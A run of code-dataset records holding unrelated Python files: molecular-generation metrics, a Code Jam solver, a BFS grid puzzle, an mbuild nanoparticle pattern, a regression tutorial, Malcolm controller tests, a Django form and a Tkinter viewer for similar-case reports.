logP),\n ('NP', NP),\n ('SA', SA),\n ('QED', QED),\n ('weight', weight)]:\n metrics[f'{name}_target'] = WassersteinMetric(func, **self.kwargs)(gen=mols, pref=self.target_int[name])\n\n return metrics\n\n def property_distributions(self, gen):\n metrics = {}\n if self.test_int is not None:\n for name in ['logP', 'NP', 'SA', 'QED', 'weight']:\n metrics[f'{name}_test'] = self.test_int[name]['values']\n if self.target_int is not None:\n for name in ['logP', 'NP', 'SA', 'QED', 'weight']:\n metrics[f'{name}_test'] = self.target_int[name]['values']\n\n gen = remove_invalid(gen, canonize=True)\n gen = list(set(gen))\n mols = mapper(self.pool)(get_mol, gen)\n for name, func in [('logP', logP),\n ('NP', NP),\n ('SA', SA),\n ('QED', QED),\n ('weight', weight)]:\n\n metrics[name] = WassersteinMetric(func, **self.kwargs).precalc(mols)['values']\n return metrics\n\n def close_pool(self):\n enable_rdkit_log()\n if self.close_pool:\n self.pool.close()\n self.pool.join()\n return\n\n\ndef compute_intermediate_statistics(smiles, n_jobs=1, device='cpu',\n batch_size=512, pool=None):\n \"\"\"\n The function precomputes statistics such as mean and variance for FCD, etc.\n It is useful to compute the statistics for test and scaffold test sets to\n speedup metrics calculation.\n \"\"\"\n close_pool = False\n if pool is None:\n if n_jobs != 1:\n pool = Pool(n_jobs)\n close_pool = True\n else:\n pool = 1\n statistics = {}\n mols = mapper(pool)(get_mol, smiles)\n kwargs = {'n_jobs': pool, 'device': device, 'batch_size': batch_size}\n #kwargs_fcd = {'n_jobs': n_jobs, 'device': device, 'batch_size': batch_size}\n #statistics['FCD'] = FCDMetric(**kwargs_fcd).precalc(smiles)\n statistics['SNN'] = SNNMetric(**kwargs).precalc(mols)\n statistics['Frag'] = FragMetric(**kwargs).precalc(mols)\n statistics['Scaf'] = ScafMetric(**kwargs).precalc(mols)\n statistics['Analogue'] = FingerprintAnaloguesMetric(**kwargs).precalc(mols)\n statistics['FG'] = FGMetric(**kwargs).precalc(mols)\n statistics['RS'] = RSMetric(**kwargs).precalc(mols)\n for name, func in [('logP', logP),\n ('NP', NP),\n ('SA', SA),\n ('QED', QED),\n ('weight', weight)]:\n statistics[name] = WassersteinMetric(func, **kwargs).precalc(mols)\n if close_pool:\n pool.terminate()\n return statistics\n\n\ndef fraction_passes_filters(gen, n_jobs=1):\n \"\"\"\n Computes the fraction of molecules that pass filters:\n * MCF\n * PAINS\n * Only allowed atoms ('C','N','S','O','F','Cl','Br','H')\n * No charges\n \"\"\"\n passes = mapper(n_jobs)(mol_passes_filters, gen)\n return np.mean(passes)\n\n\ndef internal_diversity(gen, n_jobs=1, device='cpu', fp_type='morgan', p=1):\n \"\"\"\n Computes internal diversity as:\n 1/|A|^2 sum_{x, y in AxA} (1-tanimoto(x, y))\n \"\"\"\n assert isinstance(gen[0], rdkit.Chem.rdchem.Mol) or isinstance(gen[0], np.ndarray)\n\n if isinstance(gen[0], rdkit.Chem.rdchem.Mol):\n gen_fps = fingerprints(gen, fp_type=fp_type, n_jobs=n_jobs)\n else:\n gen_fps = gen\n\n return 1 - (average_agg_tanimoto(gen_fps, gen_fps,\n agg='mean', device=device, p=p)).mean()\n\n\ndef se_diversity(gen, k=None, n_jobs=1, fp_type='morgan',\n dist_threshold=0.65, normalize=True):\n \"\"\"\n Computes Sphere exclusion diversity i.e. fraction of diverse compounds according to a pre-defined\n Tanimoto distance.\n\n :param k:\n :param gen:\n :param n_jobs:\n :param device:\n :param fp_type:\n :param gen_fps:\n :param dist_threshold:\n :param normalize:\n :return:\n \"\"\"\n assert isinstance(gen[0], rdkit.Chem.rdchem.Mol) or isinstance(gen[0], np.ndarray)\n\n if k is not None:\n if len(gen) < k:\n warnings.warn(\n f\"Can't compute SEDiv@{k/1000:.0f} \"\n f\"gen contains only {len(gen)} molecules\"\n )\n gen = gen[:k]\n\n if isinstance(gen[0], rdkit.Chem.rdchem.Mol):\n gen_fps = fingerprints(gen, fp_type=fp_type, n_jobs=n_jobs)\n else:\n gen_fps = gen\n\n bvs = numpy_fps_to_bitvectors(gen_fps, n_jobs=n_jobs)\n no_diverse = sphere_exclusion(fps=bvs, dist_thresh=dist_threshold)\n if normalize:\n return no_diverse / len(gen)\n else:\n return no_diverse\n\n\ndef fraction_unique(gen, k=None, n_jobs=1, check_validity=True):\n \"\"\"\n Computes a number of unique molecules\n Parameters:\n gen: list of SMILES\n k: compute unique@k\n n_jobs: number of threads for calculation\n check_validity: raises ValueError if invalid molecules are present\n \"\"\"\n if k is not None:\n if len(gen) < k:\n warnings.warn(\n \"Can't compute unique@{}.\".format(k) +\n \"gen contains only {} molecules\".format(len(gen))\n )\n gen = gen[:k]\n canonic = set(mapper(n_jobs)(canonic_smiles, gen))\n if None in canonic and check_validity:\n raise ValueError(\"Invalid molecule passed to unique@k\")\n return len(canonic) / len(gen)\n\n\ndef fraction_valid(gen, n_jobs=1):\n \"\"\"\n Computes a number of valid molecules\n Parameters:\n gen: list of SMILES\n n_jobs: number of threads for calculation\n \"\"\"\n gen = mapper(n_jobs)(get_mol, gen)\n return 1 - gen.count(None) / len(gen)\n\n\ndef novelty(gen, train, n_jobs=1):\n if isinstance(gen[0], rdkit.Chem.rdchem.Mol):\n gen_smiles = mapper(n_jobs)(canonic_smiles, gen)\n else:\n gen_smiles = gen\n gen_smiles_set = set(gen_smiles) - {None}\n train_set = set(train)\n return len(gen_smiles_set - train_set) / len(gen_smiles_set)\n\n\ndef remove_invalid(gen, canonize=True, n_jobs=1):\n \"\"\"\n Removes invalid molecules from the dataset\n \"\"\"\n if not canonize:\n mols = mapper(n_jobs)(get_mol, gen)\n return [gen_ for gen_, mol in zip(gen, mols) if mol is not None]\n return [x for x in mapper(n_jobs)(canonic_smiles, gen) if\n x is not None]\n\n\nclass Metric:\n def __init__(self, n_jobs=1, device='cpu', batch_size=512, **kwargs):\n self.n_jobs = n_jobs\n self.device = device\n self.batch_size = batch_size\n for k, v in kwargs.values():\n setattr(self, k, v)\n\n def __call__(self, ref=None, gen=None, pref=None, pgen=None):\n assert (ref is None) != (pref is None), \"specify ref xor pref\"\n assert (gen is None) != (pgen is None), \"specify gen xor pgen\"\n if pref is None:\n pref = self.precalc(ref)\n if pgen is None:\n pgen = self.precalc(gen)\n return self.metric(pref, pgen)\n\n def precalc(self, moleclues):\n raise NotImplementedError\n\n def metric(self, pref, pgen):\n raise NotImplementedError\n\n\nclass SNNMetric(Metric):\n \"\"\"\n Computes average max similarities of gen SMILES to ref SMILES\n \"\"\"\n\n def __init__(self, fp_type='morgan', **kwargs):\n self.fp_type = fp_type\n super().__init__(**kwargs)\n\n def precalc(self, mols):\n return {'fps': fingerprints(mols, n_jobs=self.n_jobs,\n fp_type=self.fp_type)}\n\n def metric(self, pref, pgen):\n return average_agg_tanimoto(pref['fps'], pgen['fps'],\n device=self.device)\n\n\nclass FingerprintAnaloguesMetric(Metric):\n \"\"\"\n Computes average max similarities of gen SMILES to ref SMILES\n \"\"\"\n\n def __init__(self, fp_type='morgan', **kwargs):\n self.fp_type = fp_type\n super().__init__(**kwargs)\n\n def precalc(self, mols):\n return {'fps': fingerprints(mols, n_jobs=self.n_jobs,\n fp_type=self.fp_type)}\n\n def metric(self, pref, pgen):\n return analogues_tanimoto(pref['fps'], pgen['fps'],\n device=self.device) # Tuple returned (Frac analogues, analogue coverage)\n\n\ndef cos_similarity(ref_counts, gen_counts):\n \"\"\"\n Computes cosine similarity between\n dictionaries of form {name: count}. Non-present\n elements are considered zero:\n\n sim = / ||r|| / ||g||\n \"\"\"\n if len(ref_counts) == 0 or len(gen_counts) == 0:\n return np.nan\n keys = np.unique(list(ref_counts.keys()) + list(gen_counts.keys()))\n ref_vec = np.array([ref_counts.get(k, 0) for k in keys])\n gen_vec = np.array([gen_counts.get(k, 0) for k in keys])\n return 1 - cos_distance(ref_vec, gen_vec)\n\n\nclass FragMetric(Metric):\n def precalc(self, mols):\n return {'frag': compute_fragments(mols, n_jobs=self.n_jobs)}\n\n def metric(self, pref, pgen):\n return cos_similarity(pref['frag'], pgen['frag'])\n\n\nclass ScafMetric(Metric):\n def precalc(self, mols):\n return {'scaf': compute_scaffolds(mols, n_jobs=self.n_jobs)}\n\n def metric(self, pref, pgen):\n return cos_similarity(pref['scaf'], pgen['scaf'])\n\n\nclass FGMetric(Metric):\n def precalc(self, mols):\n return {'fgs': compute_functional_groups(mols, n_jobs=self.n_jobs)}\n\n def metric(self, pref, pgen):\n return cos_similarity(pref['fgs'], pgen['fgs'])\n\n\nclass RSMetric(Metric):\n def precalc(self, mols):\n return {'rss': compute_ring_systems(mols, n_jobs=self.n_jobs)}\n\n def metric(self, pref, pgen):\n return cos_similarity(pref['rss'], pgen['rss'])\n\n\nclass WassersteinMetric(Metric):\n def __init__(self, func=None, **kwargs):\n self.func = func\n super().__init__(**kwargs)\n\n def precalc(self, mols):\n if self.func is not None:\n values = mapper(self.n_jobs)(self.func, mols)\n else:\n values = mols\n return {'values': values}\n\n def metric(self, pref, pgen):\n return wasserstein_distance(\n pref['values'], pgen['values']\n )\n","sub_path":"moleval/metrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":22021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"270995781","text":"import pdb\r\nimport sys\r\nimport re\r\nimport time\r\nimport collections\r\nfrom collections import namedtuple\r\nfrom itertools import *\r\nfrom copy import copy, deepcopy\r\nfrom pprint import pprint\r\nfrom glob import glob\r\n\r\ntaskname = 'A'\r\ninput_file = None\r\n\r\ndef readstr():\r\n return next(input_file).strip()\r\n\r\n\r\ndef readintlist():\r\n lst = list(map(int, readstr().split()))\r\n return lst\r\n\r\n\r\ndef readint():\r\n lst = readintlist()\r\n assert len(lst) == 1\r\n return lst[0]\r\n\r\n\r\nWORDS = [\"ZERO\", \"ONE\", \"TWO\", \"THREE\", \"FOUR\", \"FIVE\", \"SIX\", \"SEVEN\", \"EIGHT\", \"NINE\"]\r\n\r\ndef uniquely_determined(words):\r\n set_unique = {}\r\n for word in words:\r\n rest = set(c for w2 in words if w2 != word for c in w2)\r\n unique = [c for c in word if c not in rest]\r\n if unique:\r\n set_unique[word] = unique\r\n return set_unique\r\n\r\ndef get_ud_tiers():\r\n words = set(WORDS)\r\n tiers = []\r\n while words:\r\n unique = uniquely_determined(words)\r\n assert unique, 'remaining: ' + str(words) \r\n tiers.extend(list(unique.items()))\r\n words = set(words) - unique.keys()\r\n return tiers\r\n \r\ntiers = get_ud_tiers()\r\n \r\n\r\ndef solvecase():\r\n s = readstr()\r\n counts = collections.Counter(s)\r\n result = {}\r\n for word, letters in tiers:\r\n l = letters[0]\r\n wordcounts = collections.Counter(word)\r\n cnt = counts[l] // wordcounts[l]\r\n if cnt:\r\n# print(word, cnt, counts)\r\n result[WORDS.index(word)] = cnt \r\n counts.subtract({k : v * cnt for k, v in wordcounts.items()})\r\n assert not any(counts.values()), counts\r\n return ''.join(str(d) * cnt for d, cnt in sorted(result.items()))\r\n\r\n\r\ndef solve(input_name, output_name):\r\n global input_file\r\n tstart = time.clock()\r\n with open(input_name, 'r') as input_file, open(output_name, 'w') as output_file:\r\n casecount = readint()\r\n \r\n for case in range(1, casecount + 1):\r\n s = solvecase()\r\n s = \"Case #%d: %s\" % (case, str(s)) \r\n print(s, file=output_file)\r\n print(s)\r\n \r\n print('%s solved in %.3f' % (input_name, time.clock() - tstart))\r\n\r\n\r\ndef main():\r\n input_names = glob(taskname + '-*.in')\r\n assert len(input_names)\r\n input_names.sort(reverse = True)\r\n for input_name in input_names:\r\n solve(input_name, input_name.replace('.in', '.out')) \r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"codes/CodeJamCrawler/16_2_1/Fj./A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"200044186","text":"import sys\n\nm, n = map(int, sys.stdin.readline().split())\n\ntomato_farm = []\n\ntomato_done = 0\ntomato_all = m*n\n\nclass VertexBFS:\n\tdef __init__(self, v):\n\t\tself.v = v\n\t\tself.queue = []\n\t\tself.next_day_queue = [v]\n\n\tdef bfs_once(self):\n\t\tglobal m, n, tomato_farm, tomato_done\n\t\tself.queue = self.next_day_queue\n\t\tself.next_day_queue = []\n\t\tif(len(self.queue) == 0): return False\n\t\twhile(len(self.queue) != 0):\n\t\t\tcur_v = self.queue[0]\n\t\t\t# right\n\t\t\tif((cur_v + 1) % m != 0 and tomato_farm[cur_v+1] == 0):\n\t\t\t\ttomato_farm[cur_v+1] = 1\n\t\t\t\ttomato_done += 1\n\t\t\t\tself.next_day_queue.append(cur_v+1)\n\t\t\t# left\n\t\t\tif((cur_v % m) != 0 and tomato_farm[cur_v-1] == 0):\n\t\t\t\ttomato_farm[cur_v-1] = 1\n\t\t\t\ttomato_done += 1\n\t\t\t\tself.next_day_queue.append(cur_v-1)\n\t\t\t# up\n\t\t\tif(cur_v >= m and tomato_farm[cur_v-m] == 0):\n\t\t\t\ttomato_farm[cur_v-m] = 1\n\t\t\t\ttomato_done += 1\n\t\t\t\tself.next_day_queue.append(cur_v-m)\n\t\t\t# down\n\t\t\tif(cur_v < (n-1)*m and tomato_farm[cur_v+m] == 0):\n\t\t\t\ttomato_farm[cur_v+m] = 1\n\t\t\t\ttomato_done += 1\n\t\t\t\tself.next_day_queue.append(cur_v+m)\n\t\t\tdel self.queue[0]\n\t\treturn True\n\nfor _ in range(n):\n\ttomato_farm.extend(map(int, sys.stdin.readline().split()))\n\nstart_points = []\n\nfor i, e in enumerate(tomato_farm):\n\tif e == 1: \n\t\ttomato_done += 1\n\t\tstart_points.append(i)\n\telif e == -1: tomato_all -= 1\n\ndef all_false(l):\n\tfor element in l:\n\t\tif element:\n\t\t\treturn False\n\treturn True\n\ndef print_farm():\n\tfor i, e in enumerate(tomato_farm):\n\t\tif (i % m == 0): print()\n\t\tprint(\"{} \".format(e), end=\"\")\n\t\t\n\ndef tomato_bfs(v_list):\n\titerate = 0\n\tvclass_list = [VertexBFS(v) for v in v_list]\n\twhile(tomato_done < tomato_all):\n\t\tif all_false([c.bfs_once() for c in vclass_list]): break\n\t\titerate += 1\n\tif tomato_done != tomato_all: return -1\n\telse: return iterate\n\nprint(tomato_bfs(start_points))\n","sub_path":"7000/07576_baekjoon.py","file_name":"07576_baekjoon.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460198624","text":"from __future__ import division\n\nimport mbuild as mb\nimport numpy as np\n\n\nclass SquarePattern(mb.Pattern):\n \"\"\"A nanoparticle coating pattern where points are removed from two opposite poles on two axes.\n\n Parameters\n ----------\n chain_density : float\n Density of chain coating on the nanoparticle (chains / nm^2)\n radius : float\n Radius of the nanoparticle (nm)\n fractional_sa : float\n Fractional surface area of the nanoparticle to exclude coating (nm^2)\n \"\"\"\n def __init__(self, chain_density, radius, fractional_sa, **args):\n pattern = mb.SpherePattern(int(chain_density * 4.0 * np.pi * radius**2.0))\n pattern.scale(radius)\n total_sa = 4.0 * np.pi * radius**2.0\n patch_sa = total_sa * fractional_sa\n cutoff = patch_sa / (8 * np.pi * radius)\n points = np.array([xyz for xyz in pattern.points if xyz[2] < radius-cutoff\n and xyz[2] > cutoff-radius and xyz[1] < radius-cutoff\n and xyz[1] > cutoff-radius])\n super(SquarePattern, self).__init__(points=points, orientations=None)\n\nif __name__ == \"__main__\":\n from save_pattern import save_pattern\n square_pattern = SquarePattern(4.0, 2.0, 0.5)\n save_pattern('test.xyz', square_pattern)\n","sub_path":"cgnp_patchy/lib/patterns/square_pattern.py","file_name":"square_pattern.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140319707","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 25 09:41:03 2020\n\n@author: jagoodka\n\"\"\"\n\n# polynomial regression modelling\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\ndataset = pd.read_csv('Position_Salaries.csv')\n# basically we want to build a model to check if there is a linear dependence between independent variables (X-es) and dependent variable (y)\n\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, -1].values\n\n# first - linear regression model\nfrom sklearn.linear_model import LinearRegression\n\nlin_reg = LinearRegression()\nlin_reg.fit(X, y)\n\n\n# second - polynomial regression model\nfrom sklearn.preprocessing import PolynomialFeatures\npoly_reg = PolynomialFeatures(degree=4)\nX_poly = poly_reg.fit_transform(X)\npoly_reg.fit(X_poly, y)\n\n# result of polynomial regression is fitted into the linear regression model\nlin_reg2 = LinearRegression()\nlin_reg2.fit(X_poly, y)\n\n# Visualisations\n# linear results\nplt.scatter(X, y, c='y')\nplt.plot(X, lin_reg.predict(X), c='g')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.title('Linear regression')\nplt.show()\n\n# polynomial results\n#X_grid = np.arange(min(X), max(X), 0.1)\n#X_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, c='y')\nplt.plot(X, lin_reg2.predict(poly_reg.fit_transform(X)), c='g')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.title('Polynomial regression')\nplt.show()\n\n# predictions\n# predict salary for a person with given years of experience, I need to pass a 2D array, that's why years_of_experience is placed in double square brackets\nyears_of_experience = [[6.5]]\n\n# linear regression model\nprint(np.round(lin_reg.predict(years_of_experience), 2))\n\n# polynomial regression model\nprint(np.round(lin_reg2.predict(poly_reg.fit_transform(years_of_experience)), 2))","sub_path":"SuperDataScience/regression/polynomial_regression/polynomial_regression.py","file_name":"polynomial_regression.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"440008711","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\nimport setup_malcolm_paths\n\nfrom collections import OrderedDict\n\nimport unittest\nfrom mock import MagicMock, patch, call\n\n# logging\n# import logging\n# logging.basicConfig(level=logging.DEBUG)\n\n# module imports\nfrom malcolm.controllers import ClientController, HelloController\nfrom malcolm.core.block import Block\nfrom malcolm.vmetas import StringMeta\nfrom malcolm.compat import queue\n\nclass TestClientController(unittest.TestCase):\n\n def setUp(self):\n # Serialized version of the block we want\n source = Block()\n HelloController(MagicMock(), source, \"blockname\")\n self.serialized = source.to_dict()\n # Setup client controller prerequisites\n self.b = Block()\n self.b.name = \"blockname\"\n self.p = MagicMock()\n self.comms = MagicMock()\n self.cc = ClientController(self.p, self.b, \"blockname\")\n # get process to give us comms\n self.p.get_client_comms.return_value = self.comms\n # tell our controller which blocks the process can talk to\n response = MagicMock(id_=self.cc.REMOTE_BLOCKS_ID, value=[\"blockname\"])\n self.cc.put(response)\n # tell our controller the serialized state of the block\n response = MagicMock(id_=self.cc.BLOCK_ID, changes=[[[], self.serialized]])\n self.cc.put(response)\n\n def test_init(self):\n self.assertEqual(self.p.q.put.call_count, 1)\n req = self.p.q.put.call_args[0][0]\n self.assertEqual(req.typeid, \"malcolm:core/Subscribe:1.0\")\n self.assertEqual(req.endpoint, [self.p.name, \"remoteBlocks\", \"value\"])\n self.assertEqual(req.response_queue, self.cc)\n self.p.get_client_comms.assert_called_with(\"blockname\")\n self.assertEqual(self.comms.q.put.call_count, 1)\n req = self.comms.q.put.call_args[0][0]\n self.assertEqual(req.typeid, \"malcolm:core/Subscribe:1.0\")\n self.assertEqual(req.delta, True)\n self.assertEqual(req.response_queue, self.cc)\n self.assertEqual(req.endpoint, [\"blockname\"])\n\n def test_methods_created(self):\n self.assertEqual(list(self.b.methods), [\"disable\", \"reset\", \"say_hello\"])\n m = self.b.methods[\"say_hello\"]\n self.assertEqual(m.name, \"say_hello\")\n self.assertEqual(list(m.takes.elements), [\"name\"])\n self.assertEqual(type(m.takes.elements[\"name\"]), StringMeta)\n self.assertEqual(list(m.returns.elements), [\"greeting\"])\n self.assertEqual(type(m.returns.elements[\"greeting\"]), StringMeta)\n self.assertEqual(m.defaults, {})\n\n def test_call_method(self):\n self.p.create_queue.return_value = queue.Queue()\n def f(request):\n request.respond_with_return(dict(\n greeting=\"Hello %s\" % request.parameters.name))\n self.comms.q.put.side_effect = f\n ret = self.b.say_hello(name=\"me\")\n self.assertEqual(ret.greeting, \"Hello me\")\n\n def test_put_update_response(self):\n response = MagicMock(\n id_=self.cc.BLOCK_ID,\n changes=[[[\"substructure\"], \"change\"]])\n self.b.update = MagicMock()\n self.cc.put(response)\n self.b.update.assert_called_once_with([[\"substructure\"], \"change\"])\n\n def test_put_root_update_response(self):\n attr1 = StringMeta(\"dummy\")\n attr2 = StringMeta(\"dummy2\")\n new_block_structure = {}\n new_block_structure[\"attr1\"] = attr1.to_dict()\n new_block_structure[\"attr2\"] = attr2.to_dict()\n self.b.replace_children = MagicMock()\n response = MagicMock(\n id_=self.cc.BLOCK_ID,\n changes=[[[], new_block_structure]])\n self.cc.put(response)\n self.assertIs(self.b, self.cc.block)\n deserialized_changes = self.b.replace_children.call_args_list[0][0][0]\n serialized_changes = [x.to_dict() for x in\n deserialized_changes.values()]\n expected = [attr1.to_dict(), attr2.to_dict()]\n # dicts are not hashable, so cannot use set compare\n for x in expected:\n self.assertTrue(x in serialized_changes)\n for x in serialized_changes:\n self.assertTrue(x in expected)\n\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","sub_path":"tests/test_controllers/test_clientcontroller.py","file_name":"test_clientcontroller.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"278011933","text":"from django.forms import ModelForm\r\nfrom incoming.models import IncomingApply\r\nfrom lhwms.utils.forms import FormMixin\r\n\r\n\r\nclass IncomingApplyForm(FormMixin, ModelForm):\r\n class Meta:\r\n model = IncomingApply\r\n fields = [\r\n 'apply_cons_mark',\r\n 'mat_mark',\r\n 'mat_type',\r\n 'pars',\r\n 'test_result',\r\n 'wh_mark',\r\n 'num',\r\n ]","sub_path":"lhwms/incoming/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"330938119","text":"class person:\n age = 0\n initialAge = 24\n gender = \"male\"\n height = \"6 foot 0 inches\"\n\nnewPerson = person()\nprint(newPerson.age)\nprint(newPerson.height)\n\nclass people:\n def __init__(self,name,age):\n self.name = name\n self.age = age\n\nnew_people = people(\"Katia\",22)\nprint(new_people.name)\nprint(new_people.age)\n\nmyself = people(\"Darius\",24)\nprint(myself.name)\nprint(myself.age)\n\nprint(\"Hi my name is \" + str(myself.name) + \" and I am \" + str(myself.age) + \" years old.\")","sub_path":"2021/Code/Python/DataStructures/class_practice2.py","file_name":"class_practice2.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72005041","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 14 08:34:59 2015\n\nParamètres en ligne de commande :\n 1. C:\\Laurence\\ACCELIS\\POC\\GRAPHE_SIM.txt \n 2. C:\\Laurence\\ACCELIS\\POC\\DOCS.txt \n 3. C:\\Laurence\\ACCELIS\\POC\\CR_Bruts\n 4. C:\\Laurence\\ACCELIS\\POC\\SITES.txt \n \nC:\\Laurence\\ACCELIS\\POC\\GRAPHE_SIM.txt C:\\Laurence\\ACCELIS\\POC\\DOCS.txt C:\\Laurence\\ACCELIS\\POC\\CR_Bruts C:\\Laurence\\ACCELIS\\POC\\SITES.txt \n\n@author: adm_laurence\n\"\"\"\n\nfrom Tkinter import * \nimport numpy as np\n \n#----------------------------------------------------------------------\n\ndef Valider():\n \n global Wgraphe\n global l_noeuds\n global l_indDocsTraites\n global docs\n global sites\n global nbDocs\n global lib_noeuds\n\n l_indSites = listeSites.curselection()\n l_sites = []\n lib = \"\"\n infoNoeud.set(\"\")\n for ind in l_indSites:\n l_sites.append(sites[ind])\n lib = lib + \" \" + sites[ind]\n \n if len(l_sites) == 0: # pas de site sélectionné\n l_sites = sites # on considère tous les sites\n infoSites.set(\"TOUS SITES\") \n else:\n infoSites.set(\"Pour le(s) site(s) : \" + lib) \n \n visuFic.delete(0.1, END) \n listeNoeuds.delete(0, last=END)\n \n l_noeuds = []\n lib_noeuds = []\n l_indDocsTraites = []\n indNoeud = -1\n \n # Pour chaque document\n for i in range (0, nbDocs):\n elts = docs[i].split(\"_\") # Format du nom des fichiers : Doc__.txt\n if elts[1] in l_sites:\n # Le doc appartient à la liste des sites à traiter\n if i not in l_indDocsTraites:\n # Le doc n'a pas encore été traité\n # On crée un nouveau noeud pour ce doc en racine\n indNoeud += 1\n l_i = [i]\n l_noeuds.append(l_i)\n # On traite le document\n TrtDoc(i, indNoeud, l_sites)\n \n \n listeNoeuds.delete(0, last=END) \n liste.delete(0, last=END)\n \n # Tri par ordre décroissant du nombre de cas par noeud\n l_noeuds.sort(key=lambda e: -len(e))\n \n # Constitution de la liste écran des noeuds\n for index, w in enumerate(l_noeuds):\n l = \"Noeud \" + str(index+1) + \". ----- \" + str(len(w)-1) + \" cas\"\n lib_noeuds.append(l)\n listeNoeuds.insert(END, l)\n\n#----------------------------------------------------------------------\n \ndef immediately(e):\n global l_docsNoeud\n \n sel = liste.curselection()\n nomFic = \"CR_Bruts/\" + l_docsNoeud[sel[0]]\n fic = open(nomFic, \"r\")\n visuFic.delete(0.1, END)\n visuFic.insert(END,fic.read())\n fic.close()\n \n#----------------------------------------------------------------------\n \ndef immediatelyNoeud(e):\n global l_noeuds\n global numNoeud\n global docs\n global Wgraphe\n global l_docsNoeud\n global lib_noeuds\n \n sel = listeNoeuds.curselection() \n numNoeud = sel[0]\n infoNoeud.set(lib_noeuds[numNoeud])\n visuFic.delete(0.1, END) \n liste.delete(0, last=END)\n l_docsNoeud = []\n \n for index, l in enumerate(l_noeuds[numNoeud]):\n if index > 0:\n # On a les indices des documents\n liste.insert(END, str(index) + \". \" + docs[l])\n l_docsNoeud.append(docs[l])\n \n#----------------------------------------------------------------------\n\ndef TrtDoc(indDoc, indNoeud, l_sites):\n global l_indDocsTraites\n global l_noeuds\n global nbDocs\n global Wgraphe\n \n if indDoc not in l_indDocsTraites:\n l_indDocsTraites.append(indDoc)\n # Le doc n'est pas déjà répertorié dans un noeud\n # Fait-il partie des sites à traiter ?\n elts = docs[indDoc].split(\"_\") # Format du nom des fichiers : Doc__.txt\n if elts[1] in l_sites:\n # On l'ajoute au noeud traité\n l_noeuds[indNoeud].append(indDoc)\n # On traite le voisinage de ce document\n for j in range (indDoc+1, nbDocs):\n if Wgraphe[indDoc, j] >= float(valueDist.get()):\n TrtDoc(j, indNoeud, l_sites)\n\n#----------------------------------------------------------------------\n\n# Chargement des données\nWgraphe = np.loadtxt(\"GRAPHE_SIM.txt\")\n# Chargement des documents\ndocs = np.loadtxt(\"DOCS.txt\", dtype='str')\nnbDocs = len(docs)\n\nfenetre = Tk()\nfenetre.title(\"Liste des cas similaires\")\n\n# Création d'un widget Entry pour la saisie de la distance\nLabel(text = \"Distance min : \").grid(row=0)\nvalueDist = StringVar() \nvalueDist.set(\"0.1\")\nentreeDist = Entry(fenetre, textvariable = valueDist, width=10)\nentreeDist.grid(row=0, column=1, sticky=W)\n\n\n# Création d'un widget Label Sites\nLabel(text = \"Site(s) : \").grid(row=1, sticky=N+W)\n\n# Création d'un widget Listbox pour la liste des sites\nlisteSites = Listbox(fenetre, width=20, height=7, selectmode = MULTIPLE)\n# Chargement des sites\nsites = np.loadtxt(\"SITES.txt\", dtype='str')\nfor s in sites:\n listeSites.insert(END, s)\n# Création d'un widget Scrollbar associé\nlisteSites.grid(row=1, column=1, sticky=W)\nscrListeSites = Scrollbar(fenetre)\nscrListeSites.grid(row=1, column=2, sticky=NW+SW)\nlisteSites.config(yscrollcommand = scrListeSites.set)\nscrListeSites.config(command = listeSites.yview)\n\n# Création d'un widget Button (bouton Valider)\nbouton_valider = Button(fenetre, text ='VALIDER', bg='green', command = Valider)\nbouton_valider.grid(row=3, column=0)\n\n# Création d'un widget Label pour zone d'information\ninfoSites = StringVar()\ninfoSites.set(\"\")\nmessInfoSites = Label(fenetre, textvariable = infoSites, width=90, anchor=W, bg='grey')\nmessInfoSites.grid(row=3, column=1, columnspan=700, sticky=W)\n\n# Création d'un widget Listbox pour la liste des noeuds \nlisteNoeuds = Listbox(fenetre, width=102, height=5)\nlisteNoeuds.grid(row=4, column=1, columnspan=500, sticky=W)\n# Création d'un widget Scrollbar associé\nscrListeNoeuds = Scrollbar(fenetre)\nscrListeNoeuds.grid(row=4, column=501, sticky=NW+SW)\nlisteNoeuds.config(yscrollcommand = scrListeNoeuds.set)\nscrListeNoeuds.config(command = listeNoeuds.yview)\nlisteNoeuds.bind('<>', immediatelyNoeud)\n\n# Création d'un widget Label pour zone d'information\ninfoNoeud = StringVar()\ninfoNoeud.set(\"\")\nmessInfoNoeud = Label(fenetre, textvariable = infoNoeud, width=90, anchor=W, bg='grey')\nmessInfoNoeud.grid(row=5, column=1, columnspan=700, sticky=W)\n\n\n# Création d'un widget Listbox pour la liste des documents \nliste = Listbox(fenetre, width=102, height=5)\nliste.grid(row=8, column=1, columnspan=500, sticky=W)\n# Création d'un widget Scrollbar associé\nscrListe = Scrollbar(fenetre)\nscrListe.grid(row=8, column=501, sticky=NW+SW)\nliste.config(yscrollcommand = scrListe.set)\nscrListe.config(command = 